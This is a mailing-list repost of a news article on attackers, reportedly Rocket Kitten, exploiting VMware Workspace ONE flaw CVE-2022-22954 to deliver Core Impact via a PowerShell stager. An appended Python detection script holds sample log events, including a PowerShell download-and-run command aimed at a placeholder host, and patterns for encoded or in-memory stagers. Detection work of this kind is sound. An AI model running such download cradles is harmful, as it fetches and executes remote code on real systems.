[BreachExchange] Iranian Hacking Group Among Those Exploiting Recently Disclosed VMWare RCE Flaw

Matthew Wheeler mwheeler at flashpoint-intel.com
Tue Apr 26 08:48:27 EDT 2022


https://www.darkreading.com/attacks-breaches/-iranian-group-among-those-exploiting-recently-disclosed-rce-flaw-in-vmware

An Iranian cyber espionage group that some vendors track as Rocket Kitten
has begun exploiting a recently patched critical vulnerability in VMWare
Workspace ONE Access/Identity Manager technology to deliver the Core Impact
penetration testing tool on vulnerable systems.

VMWare disclosed the remote code execution vulnerability (CVE-2022-22954)
on April 6, at the same time as it released a patch for the issue along with
fixes for a total of seven other — somewhat less critical — vulnerabilities
that were privately reported to the company. VMWare identified the
vulnerability as a server-side template injection issue that can be
leveraged for remote code execution. The software vendor assigned it a
severity score of 9.8 out of 10 because the flaw, among other things,
allows attackers to gain the highest privileged access in compromised
environments.

Days after the flaw was disclosed, proof-of-concept exploit code for it
became publicly available on Twitter. Shortly thereafter, threat actors
reportedly began exploiting the flaw to install cryptocurrency coin miners
on vulnerable servers.

Among those that began exploiting the flaw on Apr. 14 and 15 were attackers
who used it to gain access to vulnerable networks and launch reverse HTTPS
backdoors such as Core Impact, Cobalt Strike, and Metasploit beacons,
Morphisec said in a report Monday. The tactics, techniques and procedures
of the attackers suggested a link to Rocket Kitten, the security vendor
said.

"Many groups appear to be exploiting this vulnerability, but there are not
many groups deploying stolen Core Impact implants," says Michael Gorelik,
CTO and head of threat research at Morphisec. "The US customer that we saw
targeted here is one that has an outreach to many US customers.
Unfortunately, we can't share any more details on that currently."

Morphisec has approached Core Security to validate the existence of the
watermark within the implant, he says.

The presence of the Core Impact backdoor on the targeted network, he says,
is an indication that an APT group was behind it, simply because of how
rarely the backdoor has been used by others.

Ransomware Risk

Morphisec described the new vulnerability as a server-side template
injection in an Apache Tomcat component of VMWare's Workspace ONE
Access/Identity Manager that allows remote commands to be executed on the
hosting server. The flaw greatly heightens the risk of ransomware attacks
and significant security breaches for organizations using the vulnerable
technology, the security vendor said.

VMWare Workspace ONE Access was previously known as VMWare Identity
Manager. The technology is designed to give enterprises a way to quickly
implement multifactor authentication, single sign-on, and conditional
access policies for workers attempting to access enterprise SaaS, mobile,
and Web application environments. "It is an identity provider and manager,"
Gorelik says. "It has access to all the organizational users and acts as
access control to the environment."

Morphisec said several vulnerabilities have been disclosed in the VMWare
technology recently, including two other RCE flaws, CVE-2022-22958 and
CVE-2022-22957. While both of these flaws are remotely exploitable, the
attacker would need to have gained administrative access to the vulnerable
server first. However, the new flaw from earlier this month does not
require attackers to have this level of access to exploit it, Morphisec
said.

PowerShell in the Mix

In the attack that Morphisec observed, the attacker — after gaining initial
access to the vulnerable system — deployed a PowerShell stager on it that
in turn downloaded a highly obfuscated PowerShell script called PowerTrash
Loader. The loader then loaded a Core Impact agent in system memory without
leaving a trace of forensic evidence.

Gorelik says Morphisec researchers have previously observed APT groups such
as Russia's FIN7 use PowerTrash Loader to upload remote-access Trojans such
as JSSLoader on target systems in other campaigns.

"The PowerShell command is executed as a direct command sent through
server-side template injection," Gorelik says. "The command is an
obfuscated PowerTrash downloader that eventually deployed the Core Impact
backdoor."
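A defender-side illustration of the chain described above (an added example, not code from the article or from Morphisec): it scores constructed process-creation events for the two traits the report describes, a shell spawned by the web application's server process and a PowerShell command line carrying an encoded or in-memory download stager. The key=value log format, host names, parent-process list and scoring thresholds are assumptions.

```python
import re
from os.path import basename

# Constructed process-creation events (not from the article), one per line.
SAMPLE_EVENTS = r"""ts=2022-04-14T10:02:11Z host=idm01 parent=/usr/lib/jvm/bin/java image=powershell.exe cmd=powershell -nop -w hidden -enc SQBFAFgAIAAo
ts=2022-04-14T10:02:15Z host=ws02 parent=explorer.exe image=powershell.exe cmd=powershell -File C:\scripts\backup.ps1
ts=2022-04-14T10:03:40Z host=ws02 parent=outlook.exe image=powershell.exe cmd=powershell IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')
ts=2022-04-14T10:05:00Z host=idm01 parent=/usr/lib/jvm/bin/java image=/bin/sh cmd=sh -c id
"""
EVENT_RE = re.compile(r"ts=(\S+) host=(\S+) parent=(\S+) image=(\S+) cmd=(.*)")

# Command-line traits of a stager that fetches and runs a script in memory.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)\s-e(nc|ncodedcommand)?\b"),
    "download_cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest"),
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
}
# Application-server parents (assumed list) that have no business spawning a shell.
WEB_SERVER_PARENTS = ("java", "tomcat", "catalina")

def parse_event(line):
    m = EVENT_RE.match(line)
    if not m:
        return None
    keys = ("ts", "host", "parent", "image", "cmd")
    return dict(zip(keys, m.groups()))

def score_event(ev):
    """Return (score, reasons): +2 for a web-server parent, +1 per indicator."""
    reasons = []
    if basename(ev["parent"]).lower().startswith(WEB_SERVER_PARENTS):
        reasons.append("shell_from_web_server")
    reasons += [name for name, rx in INDICATORS.items() if rx.search(ev["cmd"])]
    score = sum(2 if r == "shell_from_web_server" else 1 for r in reasons)
    return score, reasons

def triage(text):
    """Return flagged events; score >= 3 is 'high', 1-2 is 'medium'."""
    findings = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        score, reasons = score_event(ev)
        if score:
            ev.update(score=score, reasons=reasons,
                      severity="high" if score >= 3 else "medium")
            findings.append(ev)
    return findings
```

On the constructed sample, the encoded, hidden-window PowerShell launched from the Java process scores high, while the plain backup script from explorer.exe is not flagged at all.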

Organizations that implement VMWare's patch for the flaw should be
protected against it, he says. VMWare's advisory noted the flaw is being
actively exploited and pointed to workarounds for mitigating the threat for
organizations that are not able to immediately patch against it.

